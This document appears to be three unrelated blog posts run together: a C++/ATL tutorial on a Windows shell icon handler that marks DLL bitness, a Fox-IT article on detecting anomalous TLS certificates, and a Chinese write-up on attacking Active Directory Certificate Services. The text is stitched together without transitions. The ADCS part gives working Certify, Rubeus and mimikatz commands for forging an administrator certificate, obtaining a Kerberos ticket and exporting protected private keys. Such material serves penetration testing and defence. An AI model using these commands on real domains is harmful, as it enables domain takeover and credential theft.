class ATL_NO_VTABLE CIconHandler : public CComObjectRootEx<CComSingleThreadModel>, public CComCoClass<CIconHandler, &CLSID_IconHandler>, public IPersistFile, public IExtractIcon { public: BEGIN_COM_MAP(CIconHandler) COM_INTERFACE_ENTRY(IPersistFile) COM_INTERFACE_ENTRY(IExtractIcon) END_COM_MAP() //... // Inherited via IPersistFile HRESULT __stdcall GetClassID(CLSID* pClassID) override; HRESULT __stdcall IsDirty(void) override; HRESULT __stdcall Load(LPCOLESTR pszFileName, DWORD dwMode) override; HRESULT __stdcall Save(LPCOLESTR pszFileName, BOOL fRemember) override; HRESULT __stdcall SaveCompleted(LPCOLESTR pszFileName) override; HRESULT __stdcall GetCurFile(LPOLESTR* ppszFileName) override; // Inherited via IExtractIconW HRESULT __stdcall GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) override; HRESULT __stdcall Extract(PCWSTR pszFile, UINT nIconIndex, HICON* phiconLarge, HICON* phiconSmall, UINT nIconSize) override; };
Now for the implementation. The IPersistFile
interface seems non-trivial, but fortunately we just need to implement the Load
method for an icon handler. This is where we get the file name we need to inspect. To check whether a DLL is 64 or 32 bit, we’ll add a simple enumeration and a helper function to the CIconHandler
class:
enum class ModuleBitness { Unknown, Bit32, Bit64 }; static ModuleBitness GetModuleBitness(PCWSTR path);
The implementation of IPersistFile::Load
looks something like this:
HRESULT __stdcall CIconHandler::Load(LPCOLESTR pszFileName, DWORD dwMode) { ATLTRACE(L"CIconHandler::Load %s\n", pszFileName); m_Bitness = GetModuleBitness(pszFileName); return S_OK; }
The method receives the full path of the DLL we need to examine. How do we know that only DLL files will be delivered? This has to do with the registration we’ll make for the icon handler. We’ll register it for DLL file extensions only, so that other file types will not be provided. Calling GetModuleBitness
(shown later) performs the real work of determining the DLL’s bitness and stores the result in m_Bitness
(a data member of type ModuleBitness
).
All that’s left to do is tell explorer which icon to use. This is the role of IExtractIcon
. The Extract
method can be used to provide an icon handle directly, which is useful if the icon is “dynamic” – perhaps generated by different means in each case. In this example, we just need to return one of two icons which have been added as resources to the project (you can find those in the project source code. This is also an opportunity to provide your own icons).
For our case, it’s enough to return S_FALSE
from Extract
that causes explorer to use the information returned from GetIconLocation
. Here is its implementation:
HRESULT __stdcall CIconHandler::GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) { if (s_ModulePath[0] == 0) { ::GetModuleFileName(_AtlBaseModule.GetModuleInstance(), s_ModulePath, _countof(s_ModulePath)); ATLTRACE(L"Module path: %s\n", s_ModulePath); } if (s_ModulePath[0] == 0) return S_FALSE; if (m_Bitness == ModuleBitness::Unknown) return S_FALSE; wcscpy_s(pszIconFile, wcslen(s_ModulePath) + 1, s_ModulePath); ATLTRACE(L"CIconHandler::GetIconLocation: %s bitness: %d\n", pszIconFile, m_Bitness); *piIndex = m_Bitness == ModuleBitness::Bit32 ? 0 : 1; *pwFlags = GIL_PERINSTANCE; return S_OK; }
The method’s purpose is to return the current (our icon handler DLL) module’s path and the icon index to use. This information is enough for explorer to load the icon itself from the resources. First, we get the module path to where our DLL has been installed. Since this doesn’t change, it’s only retrieved once (with GetModuleFileName
) and stored in a static variable (s_ModulePath
).
If this fails (unlikely) or the bitness could not be determined (maybe the file was not a PE at all, but just had such an extension), then we return S_FALSE
. This tells explorer to use the default icon for the file type (DLL). Otherwise, we store 0 or 1 in piIndex
, based on the IDs of the icons (0 corresponds to the lower of the IDs).
Finally, we need to set a flag inside pwFlags
to indicate to explorer that this icon extraction is required for every file (GIL_PERINSTANCE
). Otherwise, explorer calls IExtractIcon
just once for any DLL file, which is the opposite of what we want.
The final piece of the puzzle (in terms of code) is how to determine whether a PE is 64 or 32 bit. This is not the point of this post, as any custom algorithm can be used to provide different icons for different files of the same type. For completeness, here is the code with comments:
CIconHandler::ModuleBitness CIconHandler::GetModuleBitness(PCWSTR path) { auto bitness = ModuleBitness::Unknown; // // open the DLL as a data file // auto hFile = ::CreateFile(path, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0, nullptr); if (hFile == INVALID_HANDLE_VALUE) return bitness; // // create a memory mapped file to read the PE header // auto hMemMap = ::CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, 0, nullptr); ::CloseHandle(hFile); if (!hMemMap) return bitness; // // map the first page (where the header is located) // auto p = ::MapViewOfFile(hMemMap, FILE_MAP_READ, 0, 0, 1 << 12); if (p) { auto header = ::ImageNtHeader(p); if (header) { auto machine = header->FileHeader.Machine; bitness = header->Signature == IMAGE_NT_OPTIONAL_HDR64_MAGIC || machine == IMAGE_FILE_MACHINE_AMD64 || machine == IMAGE_FILE_MACHINE_ARM64 ? ModuleBitness::Bit64 : ModuleBitness::Bit32; } ::UnmapViewOfFile(p); } ::CloseHandle(hMemMap); return bitness; }
To make all this work, there is still one more concern: registration. Normal COM registration is necessary (so that the call to CoCreateInstance
issued by explorer has a chance to succeed), but not enough. Another registration is needed to let explorer know that this icon handler exists, and is to be used for files with the extension “DLL”.
Fortunately, ATL provides a convenient mechanism to add Registry settings using a simple script-like configuration, which does not require any code. The added keys/values have been placed in DllIconHandler.rgs
like so:
HKCR { NoRemove DllFile { NoRemove ShellEx { IconHandler = s '{d913f592-08f1-418a-9428-cc33db97ed60}' } } }
This sets an icon handler in HKEY_CLASSES_ROOT\DllFile\ShellEx
, where the IconHandler
value specifies the CLSID of our component. You can find the CLSID in the IDL file where the coclass
element is defined:
[ uuid(d913f592-08f1-418a-9428-cc33db97ed60) ] coclass IconHandler {
Replace your own CLSID if you’re building this project from scratch. Registration itself is done with the RegSvr32
built-in tool. With an ATL project, a successful build also causes RegSvr32
to be invoked on the resulting DLL, thus performing registration. The default behavior is to register in HKEY_CLASSES_ROOT
which uses HKEY_LOCAL_MACHINE
behind the covers. This requires running Visual Studio elevated (or an elevated command window if called from outside VS). It will register the icon handler for all users on the machine. If you prefer to register for the current user only (which uses HKEY_CURRENT_USER
and does not require running elevated), you can set the per-user registration in VS by going to project properties, clinking on the Linker element and setting per-user redirection:
If you’re registering from outside VS, the per-user registration is achieved with:
regsvr32 /n /i:user <dllpath>
This is it! The full source code is available here.
image-2
zodiacon
- Fox-IT
- Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm
Author: Margit Hazenbroek
tl;dr
An approach to detecting suspicious TLS certificates using an incremental anomaly detection model is discussed. This model utilizes the Half-Space-Trees algorithm and provides our security operations teams (SOC) with the opportunity to detect suspicious behavior, in real-time, even when network traffic is encrypted.
The prevalence of encrypted traffic
As a company that provides Managed Network Detection & Response services an increase in the use of encrypted traffic has been observed. This trend is broadly welcome. The use of encrypted network protocols yields improved mitigation against eavesdropping. However, in an attempt to bypass security detection that relies on deep packet inspection, it is now a standard tactic for malicious actors to abuse the privacy that encryption enables. For example, when conducting malicious activity, such as command and control of an infected device, connections to the attacker controlled external domain now commonly occur using HTTPS.
The application of a range of data science techniques is now integral to identifying malicious activity that is conducted using encrypted network protocols. This blogpost expands on one such technique, how anomalous characteristics of TLS certificates can be identified using the Half Space Trees algorithm. In combination with other modelling, like the identification of an unusual JA3 hash [i], beaconing patterns [ii] or randomly generated domains [iii], effective detection logic can be created. The research described here has subsequently been further developed and added to our commercial offering. It is actively facilitating real time detection of malicious activity.
Malicious actors abuse the trust of TLS certificates
TLS certificates are a type of digital certificate, issued by a Certificate Authority (CA) certifying that they have verified the owners of the domain name which is the subject of the certificate. TLS certificates usually contain the following information:
- The subject domain name
- The subject organization
- The name of the issuing CA
- Additional or alternative subject domain names
- Issue date
- Expiry date
- The public key
- The digital signature by the CA [iv].
If malicious actors want to use TLS to ensure that they appear as legitimate traffic they have to obtain a TLS certificate (Mitre, T1608.003) [v]. Malicious actors can obtain certificates in different ways, most commonly by:
- Obtaining free certificates from a CA. CA’s like Let’s Encrypt issue free certificates. Malicious actors are known to widely abuse this trust relationship (vi, vii).
- Creating self-signed certificates. Self-signed certificates are not signed by a CA. Certain attack frameworks such as Cobalt Strike offer the option to generate self-signed certificates.
- Buying or stealing certificates from a CA. Malicious actors can deceive a CA to issue a certificate for a fake organization.
The following example shows the subject name and issue name of a TLS certificate in a recent Ryuk ransomware campaign.
Subject Name:
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com
Issuer Name:
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com
Example 1. Subject and issuer fields in a TLS certificate used in Ryuk ransomware
The meaning of the attributes that can be found in the issuer name and subject name fields of TLS certificates are defined in RFC 5280 and are explained in the table below.
Attribute | |
C | Country of the entity |
S | State of province |
L | Locality |
O | Organizational name |
OU | Organizational Unit |
CN | Common Name |
Note the following characteristics that can be observed in this malicious certificate:
- It is a self-signed certificate as no CA present in the Issuer Name.
- The Organization names attribute contains the string “lol”
- The Organizational Units attribute is empty
- A domain name is present in the Common Name (ix, x)
Compare these characteristics to the legitimate certificate used by the fox-it.com domain.
Subject Name:
C=GB, L=Manchester, O=NCC Group PLC, CN=www.nccgroup.com
Issuer Name:
C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K
Example 2. Subject and issuer fields in a TLS certificate used by fox-it.com
Observe the attributes in the Subject and Issuer Name. In the Subject Name is information about the owner of the certificate. In the Issuer Name is information of the CA.
Using machine learning to identify anomalous certificates
When comparing the legitimate and malicious certificate the certificate used in Ryuk ransomware “looks weird”. If humans could identify that the malicious certificate is peculiar, could machines also learn to classify such a certificate as anomalous? To explore this question a dataset of “known good” and “known bad” TLS certificates was curated. Using white-box algorithms, such as Random Forest, several features were identified that helped classify malicious certificates. For example, the number of empty attributes had a statistical relationship with how likely it was used for malicious activities.However, it was soon recognized that such an approach was problematic, there was a risk of “over-fitting” the algorithm to the training data, a situation whereby the algorithm would perform well on the training dataset but perform poorly when applied to real life data. Especially in a stream of data that evolves over time, such as network data, it is challenging to maintain high detection precision. To be effective this model needed the ability to become aware of new patterns that may present themselves outside of the small sample of training data provide; an unsupervised machine learning model which could detect anomalies in real-time was required.
An isolation-based anomaly detection approach
The Isolation Forest was the first isolation-based anomaly detection model, created by Liu et al. in 2008 (xi). The referenced paper presented an intuitive but powerful idea. Anomalous data points are rare. And a property of rarity is that the anomalous data point must be easier to isolate from the rest of the data.
From this insight the algorithm proposed computes the ease of isolating an anomaly. It achieves this by making a tree to split the data (visualization 1 includes an example of a tree structure). The more anomalous an observation is the faster an anomaly gets isolated in the tree, and the less splits in the tree are needed. Note, the Isolation Forest is an ensemble method, meaning it builds multiple trees (forest) and calculates the average amounts of splits made by the trees to isolate an anomaly (xi).
An advantage of this approach is that, in contrast to density and distance-based approaches, less computational cost is required to identify anomalies (xi, xii) whilst maintaining comparable levels of performance metrics (viii, ix).
Half-Space-Trees: Isolation-based approach for streaming data
In 2011, building on their earlier work, Tan and Liu created an isolation-based algorithm called Half-Space-Trees (HST) that utilized incremental learning techniques. HST enables an isolation-based anomaly detection approach to be applied to a stream of continuous data (xiii). The animation below demonstrates how a simple half-space-tree isolates anomalies in the window space with a tree-based structure:
Visualization 1: An example of 2-dimensional data in a window divided by two simple half-space-trees, the visualization is inspired by the original paper.
The HST is also an ensemble method, meaning it builds multiple half-space-trees. A single half-space-tree bisects the window (space) in half-spaces based on the features in the data. Every single half-space-tree does this randomly and goes on as long as the set height of the tree. The half-space-tree calculates the amount of data points per subspace and gives a mass score to that subspace (which is represented by the colors).
The subspaces where most datapoints fall in are considered high-mass subspaces, and the subspaces with low or no data points are considered low-mass subspaces. Most data points are expected to fall in high-mass subspaces because they need many more splits (i.e., a higher tree) to be isolated. The sum of the mass of all half-space-trees becomes the final anomaly score of the HST (xiii). Calculating mass is a different approach than looking at the number of splits (as conducted in the Isolation Forest). Even so, using recursive methods calculating the mass profile is maintained as a simple and fast way of computing data points in streaming data (xiii).
Moreover, the HST works with two consecutive windows; the reference window and the latest window. The HST learns the mass profile in the reference window and uses it as a reference for new incoming data in the latest window. Without going too deep into the workings of the windows, it is worth mentioning that the reference window is updated every time the latest window is full. Namely, when the latest window is full, it will override the mass profile to the reference window and the latest window is cleared so new data can come in. By updating its windows in this way, the HST is robust for evolving streaming data (xiii).
The anomaly scores output issued by HSTs falls between 0 and 1. The closer the anomaly score is to 1 the easier it was to isolate the certificate and the more likely that the certificate is anomalous. Testing HSTs on our initial collated data it was satisfied that this was a robust approach to the problem, with the Ryuk ransomware certificate repeatedly identified with an anomaly score of 0.84.
The importance of feedback loops – going from research to production
As a provider of managed cyber security services, we are fortunate to have a number of close customers who were willing to deploy the model in a controlled setting on live network traffic. In conjunction with quick feedback from human analysts on the anomaly scores that were being outputted it was possible to optimize the model to ensure that it produced sensible scoring across a wide range of environments. Having achieved credibility, the model could be more widely deployed. In an example of the economic concept of “network effects” the more environments on which the model was deployed, the more model performance has improved and proved itself adaptable to the unique environment in which it is operating.
Whilst high anomaly scores do not necessarily indicate malicious behavior, they are a measure of weirdness or novelty. Combining the anomaly scoring obtained from HSTs with other metrics or rules, derived in real-time, it has become possible to classify malicious activity with greater certainty.
Machines can learn to detect suspicious TLS certificates
An unsupervised, incremental anomaly detection model is applied in our security operations centers and now part of our commercial offerings. We would like to encourage other cyber security defenders to look at the characteristics of TLS certificates to detect malicious activities even when traffic is encrypted. Encryption does not equal invisibility and there is often (meta)data to consider. Accordingly so, it requires different approaches to search for malicious activity. Particularly as a Data Science team we found that the Half-Space-Trees is an effective and quick anomaly detector in streaming network data.
References
[i] NCC Group & Fox-IT. (2021). “Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes.”
https://research.nccgroup.com/2021/06/14/incremental-machine-leaning-by-example-detecting-suspicious-activity-with-zeek-data-streams-river-and-ja3-hashes/
[ii] Van Luijk, R. (2020) “Hunting for beacons.” Fox-IT.
[iii] Van Luijk, R., Postma, A. (2019). “Using Anomaly Detecting to Find Malicious Domains” Fox-It < https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/ >
[iv] https://protonmail.com/blog/tls-ssl-certificate/
[v] https://attack.mitre.org/techniques/T1608/003/
[vi] Mokbel, M. (2021). “The State of SSL/TLS Certificate Usage in Malware C&C Communications.” Trend Micro.
https://www.trendmicro.com/en_us/research/21/i/analyzing-ssl-tls-certificates-used-by-malware.html
[vii] https://sslbl.abuse.ch/statistics/
[viii] Cooper, D., Santesson, S., Farrell, S., Boeyen, S., Housley, R., and W. Polk. (2008). “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”, RFC 5280, DOI 10.17487/RFC5280.
https://datatracker.ietf.org/doc/html/rfc5280
[ix] https://attack.mitre.org/software/S0446/
[x] Goody, K., Kennelly, J., Shilko, J. Elovitz, S., Bienstock, D. (2020). “Kegtap and SingleMalt with Ransomware Chaser.” FireEye.
https://www.fireeye.com/blog/jp-threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
[xi] Liu, F. T. , Ting, K. M. & Zhou, Z. (2008). “Isolation Forest”. Eighth IEEE International Conference on Data Mining, pp. 413-422, doi: 10.1109/ICDM.2008.17.
https://ieeexplore.ieee.org/document/4781136
[xii] Togbe, M.U., Chabchoub, Y., Boly, A., Barry, M., Chiky, R., & Bahri, M. (2021). “Anomalies Detection Using Isolation in Concept-Drifting Data Streams.” Comput., 10, 13.
https://www.mdpi.com/2073-431X/10/1/13
[xiii] Tan, S. Ting, K. & Liu, F. (2011). “Fast Anomaly Detection for Streaming Data.” 1511-1516. 10.5591/978-1-57735-516-8/IJCAI11-254.
https://www.ijcai.org/Proceedings/11/Papers/254.pdf
ADCS 攻击面挖掘与利用
Author: Imanfeng
0x00 前言
在 BlackHat21 中 Specterops 发布了 Active Directory Certificate Services 利用白皮书,尽管 ADCS 并不是默认安装但在大型企业域中通常被广泛部署。本文结合实战讲述如何在域环境中利用 ADCS 手法拿下域控,哪些对象 ACL 可用于更好的权限维持并涉及 ADCS 的基础架构、攻击面、后利用等。
0x01 技术背景
1. 证书服务
PKI公钥基础结构
在 PKI (公钥基础结构)中,数字证书用于将公密钥对的公钥与其所有者的身份相关联。为了验证数字证书中公开的身份,所有者需要使用私钥来响应质询,只有他才能访问。
Microsoft 提供了一个完全集成到 Windows 生态系统中的公钥基础结构 (PKI) 解决方案,用于公钥加密、身份管理、证书分发、证书撤销和证书管理。启用后,会识别注册证书的用户,以便以后进行身份验证或撤销证书,即 Active Directory Certificate Services (ADCS)。
ADCS关键术语
- 根证书颁发机构 (Root Certification Authority)
证书基于信任链,安装的第一个证书颁发机构将是根 CA,它是我们信任链中的起始。 - 从属 CA (Subordinate CA)
从属 CA 是信任链中的子节点,通常比根 CA 低一级。 - 颁发 CA (Issuing CA)
颁发 CA 属于从属 CA,它向端点(例如用户、服务器和客户端)颁发证书,并非所有从属 CA 都需要颁发 CA。 - 独立 CA (Standalone CA)
通常定义是在未加入域的服务器上运行的 CA。 - 企业 CA (Enterprise CA)
通常定义是加入域并与 Active Directory 域服务集成的 CA。 - 电子证书 (Digital Certificate)
用户身份的电子证明,由 Certificate Authority 发放(通常遵循X.509标准)。 - AIA (Authority Information Access)
权威信息访问 (AIA) 应用于 CA 颁发的证书,用于指向此证书颁发者所在的位置引导检查该证书的吊销情况。 - CDP (CRL Distribution Point)
包含有关 CRL 位置的信息,例如 URL (Web Server)或 LDAP 路径 (Active Directory)。 - CRL (Certificate Revocation List)
CRL 是已被撤销的证书列表,客户端使用 CRL 来验证提供的证书是否有效。
ADCS服务架构
微软官方 ADCS 服务架构中的两层 PKI 环境部署结构示例如下:
ORCA1:首先使用本地管理员部署单机离线的根 CA,配置 AIA 及 CRL,导出根 CA 证书和 CRL 文件
- 由于根 CA 需要嵌入到所有验证证书的设备中,所以出于安全考虑,根 CA 通常与客户端之间做网络隔离或关机且不在域内,因为一旦根 CA 遭到管理员误操作或黑客攻击,需要替换所有嵌入设备中的根 CA 证书,成本极高。
- 为了验证由根 CA 颁发的证书,需要使 CRL 验证可用于所有端点,为此将在从属 CA (APP1) 上安装一个 Web 服务器来托管验证内容。根 CA 机器使用频率很低,仅当需要进行添加另一个从属/颁发 CA、更新 CA 或更改 CRL。
APP1:用于端点注册的从属 CA,通常完成以下关键配置
- 将根 CA 证书放入 Active Directory 的配置容器中,这样允许域客户端计算机自动信任根 CA 证书,不需要在组策略中分发该证书。
- 在离线 ORCA1上申请 APP1 的 CA 证书后,利用传输设备将根 CA 证书和 CRL文件放入 APP1 的本地存储中,使 APP1 对根 CA 证书和根 CA CRL 的迅速直接信任。
- 部署 Web Server 以分发证书和 CRL,设置 CDP 及 AIA。
LDAP属性
ADCS 在 LDAP 容器中进行了相关属性定义 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
,部分前面提到过
Certificate templates
ADCS 的大部分利用面集中在证书模板中,存储为 CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
,其 objectClass 为 pKICertificateTemplate
,以下为证书的字段
- 常规设置:证书的有效期
- 请求处理:证书的目的和导出私钥要求
- 加密:要使用的加密服务提供程序 (CSP) 和最小密钥大小
- Extensions:要包含在证书中的 X509v3 扩展列表
- 主题名称:来自请求中用户提供的值,或来自请求证书的域主体身份
- 发布要求:是否需要“CA证书管理员”批准才能通过证书申请
- 安全描述符:证书模板的 ACL,包括拥有注册模板所需的扩展权限
证书模板颁发首先需要在 CA 的 certtmpl.msc
进行模板配置,随后在 certsrv.msc
进行证书模板的发布。在 Extensions 中证书模板对象的 EKU (pKIExtendedKeyUsage) 属性包含一个数组,其内容为模板中已启用的 OID (Object Identifiers)
这些自定义应用程序策略 (EKU oid) 会影响证书的用途,以下 oid 的添加才可以让证书用于 Kerberos 身份认证
描述 | OID |
---|---|
Client Authentication | 1.3.6.1.5.5.7.3.2 |
PKINIT Client Authentication | 1.3.6.1.5.2.3.4 |
Smart Card Logon | 1.3.6.1.4.1.311.20.2.2 |
Any Purpose | 2.5.29.37.0 |
SubCA | (no EKUs) |
Enterprise NTAuth store
NtAuthCertificates 包含所有 CA 的证书列表,不在内的 CA 无法处理用户身份验证证书的申请
向 NTAuth 发布/添加证书:
certutil –dspublish –f IssuingCaFileName.cer NTAuthCA
要查看 NTAuth 中的所有证书:
certutil –viewstore –enterprise NTAuth
要删除 NTAuth 中的证书:
certutil –viewdelstore –enterprise NTAuth
域内机器在注册表中有一份缓存:
HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates
当组策略开启“自动注册证书”,等组策略更新时才会更新本地缓存。
Certification Authorities & AIA
Certification Authorities 容器对应根 CA 的证书存储。当有新的颁发 CA 安装时,它的证书则会自动放到 AIA 容器中。
来自他们容器的所有证书同样会作为组策略处理的一部分传播到每个网络连通的客户端,当同步出现问题的话 KDC 认证会抛 KDC_ERR_PADATA_TYPE_NOSUPP
报错。
Certificate Revocation List
前面在 PKI 服务架构中提到了,证书吊销列表 (CRL) 是由颁发相应证书的 CA 发布的已吊销证书列表,将证书与 CRL 进行比较是确定证书是否有效的一种方法。
CN=<CA name>,CN=<ADCS server>,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=
通常证书由序列号标识,CRL 除了吊销证书的序列号之外还包含每个证书的吊销原因和证书被吊销的时间。
2. 证书注册
证书注册流程
ADCS 认证体系中的证书注册流程大致如下:
- 客户端创建公钥/私钥对;
- 将公钥与其他信息 (如证书的主题和证书模板名称) 一起放在证书签名请求 (CSR) 消息中,并使用私钥签署;
- CA 首先判断用户是否允许进行证书申请,证书模板是否存在以及判断请求内容是否符合证书模板;
- 通过审核后,CA 生成含有客户端公钥的证书并使用自己的私钥来签署;
- 签署完的证书可以进行查看并使用。
证书注册方式
1. 证书颁发机构 Web 注册
在部署 CA 时勾选证书颁发机构 Web 注册,即可在 http://CA-Computer/certsrv
身份认证后进行证书申请。
2. 客户端 GUI 注册
域内机器可以使用 certmgr.msc
(用户证书),certlm.msc
(计算机证书) GUI 请求证书
3. 命令行注册
域内机器可以通过 certreq.exe
或Powershell Get-Certificate
申请证书,后面有使用示例
4. DCOM调用
基于 DCOM 的证书注册遵循 MS-WCCE 协议进行证书请求,目前大多数 C#、python、Powershell的 ADCS 利用工具都按照 WCCE 进行证书请求。
证书注册权限
在 Active Directory 中权限控制是基于访问控制模型的,其包含两个基本部分:
- 访问令牌,其中包含有关登录用户的信息
- 安全描述符,其中包含保护安全对象的安全信息
在 ADCS 中使用两种安全性定义注册权限 (主体可以请求证书) ,一个在证书模板 AD 对象上,另一个在企业 CA 本身上。
在颁发 CA 机器上使用 certtmpl.msc
可查看所有证书模板,通过安全扩展可以对证书模板的用户访问权限查看。
可以在颁发 CA 机器上使用 certsrv.msc
查看 CA 对于用户的访问权限设置。
0x02 证书使用
1. 证书认证
Kerberos认证
Kerberos 是域环境中主要的认证协议,其认证流程大致如下:
- AS_REQ:client 用 client_hash 、时间戳向 KDC 进行身份验证;
- AS_REP:KDC 检查 client_hash 与时间戳,如果正确则返回 client 由 krbtgt 哈希加密的 TGT 票据和 PAC 等相关信息;
- TGS_REQ:client 向 KDC 请求 TGS 票据,出示其 TGT 票据和请求的 SPN;
- TGS_REP:KDC 如果识别出 SPN ,则将该服务账户的 NTLM 哈希加密生成的 ST 票据返回给 client;
- AP_REQ:client 使用 ST 请求对应服务,将 PAC 传递给服务进行检查。服务通过 PAC 查看用户的 SID 和用户组等并与自身的 ACL 进行对比,如果不满足则作为适当的 RPC 状态代码返回;
- AP_REP:服务器验证 AP-REQ,如果验证成功则发送 AP-REP,客户端和服务端通过中途生成的 Session key 等信息通过加解密转换验证对方身份。
PKINIT认证
在 RFC 4556 中定义了 PKINIT 为 Kerberos 的扩展协议,可通过 X.509 证书用来获取 Kerberos 票据 (TGT)。
PKINIT 与 Kerberos 差别主要在 AS 阶段:
- PKINIT AS_REQ:发d送内容包含证书,私钥进行签名。KDC 使用公钥对数字签名进行校验,确认后返回使用证书公钥加密的 TGT 并且消息是使用 KDC 私钥签名;
- PKINIT AS_REP:客户端使用 KDC 公钥进行签名校验,随后使用证书私钥解密成功拿到 TGT。
详细的协议流程规范:http://pike.lysator.liu.se/docs/ietf/rfc/45/rfc4556.xml
NTLM凭据
在2016年,通过证书获取 NTLM 的功能就被集成在 kekeo 和 mimikatz 中,核心在于当使用证书进行 PKCA 扩展协议认证的时候,返回的 PAC 中包含了 NTLM 票据。
即使用户密码改了,通过证书随时可以拿到 NTLM。获取能用来进行 Kerberos 身份认证的证书需要满足一下几个条件:
1. 证书模板OID
前面我们提到了,目前已知应用程序策略 (oid) 只有包含了 Client Authentication、PKINIT Client Authentication、Smart Card Logon、Any Purpose、SubCA 时,对应的证书才能充当 PKINIT 身份认证凭据。
2. 证书请求权限
- 用户拥有向 CA 申请证书的权限;
- 用户拥有证书模板申请证书的权限。
2. 证书获取
导出机器证书
通过 certlm.msc
图形化或 certutil.exe
进行证书导出。
当私钥设置为不允许导出的时候,利用 Mimikatz 的 crypto::capi
命令可以 patch 当前进程中的 capi ,从而利用 Crypto APIs 导出含有私钥的证书。
导出用户证书
通过 certmgr.msc
图形化或 certutil.exe
进行用户证书导出。
遇到私钥限制同样可尝试 crypto::capi
导出证书。
本地检索证书
在实战中会遇到证书、私钥文件就在文件夹内并不需要导出,其后缀文件主要有以下几种
后缀 | 描述 |
---|---|
.pfx\ .p12\ .pkcs12 | 含公私钥,通常有密码保护 |
.pem | 含有base64证书及私钥,可利用openssl格式转化 |
.key | 只包含私钥 |
.crt\ .cer | 只包含证书 |
.csr | 证书签名请求文件,不含有公私钥 |
.jks\ .keystore\ .keys | 可能含有 java 应用程序使用的证书和私钥 |
可结合自身需求通过开源工具或自研武器来满足检索文件后缀的需求。
0x03 证书滥用
本节围绕 ADCS 从证书模板的滥用到权限维持滥用进行讲解
1. 证书模板
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 滥用
该错误配置在企业 ADCS 中是最为常见的,需满足的条件为:
- 颁发 CA 授予低权限用户请求权限 (默认)
- 模板中 CA 管理员审批未启用 (默认)
- 模板中不需要授权的签名 (默认)
- 模板允许低权限用户注册
- 模板定义了启用认证的 EKU
- 证书模板允许请求者在 CSR 中指定一个 subjectAltName
如果满足上列条件,当攻击者在请求证书时可通过 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
字段来声明自己的身份,从而可获取到伪造身份的证书,Certify 为白皮书配套的 ADCS 利用工具。
Certify.exe find /vulnerable
使用 certutil.exe -TCAInfo
判断 CA 状态及当前用户请求的权限情况
利用 Certify 的 set altname 来伪造 administrator 身份尝试得到证书
Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:”ESC1“ /altname:administrator
成功通过申请后可得到含有公私钥的 pem 证书文件,使用 openssl 进行格式转化
/usr/bin/openssl pkcs12 -in ~/cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ~/cert.pfx
20.11后的 Rubeus 进行了 PKINIT 证书支持,使用 cert.pfx 作为 administrator 身份申请 TGT,成功获得 administrator 的票据
Rubeus4.exe asktgt /user:Administrator /certificate:cert.pfx /password:123456 /outfile:cert.kribi /ptt
Any EKU OR no EKU
与第一种利用需满足的条件前四点相同的用户证书非机器证书,主要差别在 EKU 的描述:
- 颁发 CA 授予低权限用户请求权限 (默认)
- 模板中 CA 管理员审批未启用 (默认)
- 模板中不需要授权的签名 (默认)
- 模板允许低权限用户注册
- 证书模板中定义了 no EKU 或 any EKU
可使用 certutil.exe
检查模板的 pKIExtendedKeyUsage
字段是否为空
certutil -v -dstemplate
通过 Certify 成功定位到恶意模板
该利用方式并不是能直接通过 Kerberos 认证来伪造用户。Any Purpose (OID 2.5.29.37.0) 可以用于任何目的,包括客户端身份验证,如果没有指定eku,即 pkiextendedkeyusag 为空那么该证书就相当于从属 CA 的证书,可以用于任何情况给其他用户来颁发证书。
前面说过 CA 证书不在 NtAuthCertificates 内的话,是无法为身份认证作用来颁发证书的,所以该利用手段无法直接伪造用户,但可以用来签发用于其他应用,例如 ADFS ,它是 Microsoft 作为 Windows Server 的标准角色提供的一项服务,它使用现有的 Active Directory 凭据提供 Web 登录,感兴趣的可以自己搭环境试一试。
注册代理证书滥用
CA 提供一些基本的证书模板,但是标准的 CA 模板不能直接使用,必须首先复制和配置。部分企业出于便利性通过在服务器上设置可由管理员或注册代理来直接代表其他用户注册对应模板得到使用的证书。
实现该功能需要两个配置模板:
- 颁发“注册代理”的证书模板
- 满足代表其他用户进行注册的证书模板
模板一为颁发“注册代理”证书
- 颁发 CA 授予低权限用户请求权限 (默认)
- 模板中 CA 管理员审批未启用 (默认)
- 模板中不需要授权的签名 (默认)
- 模板允许低权限用户注册
- 证书模板中定义了证书请求代理 EKU (1.3.6.1.4.1.311.20.2.1)
模板二为允许使用“注册代理”证书去代表其他用户申请身份认证证书
- 颁发 CA 授予低权限用户请求权限 (默认)
- 模板中 CA 管理员审批未启用 (默认)
- 模板中不需要授权的签名 (默认)
- 模板允许低权限用户注册
- 模板定义了启用认证的 EKU
- 模板模式版本1或大于2并指定应用策略,签发要求证书请求代理 EKU
- 没有在 CA 上对登记代理进行限制 (默认)
申请注册代理证书并连同私钥导出为 esc3_1.pfx
利用 Certify 通过 esc3_1.pfx 代表 administrator 申请 esc3_2.pfx 的身份认证证书,得到的证书同样可以进行 ptt 利用
Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:ESC3_2 /onbehalfof:administrator /enrollcert:esc3_1.pfx /enrollcertpw:123456
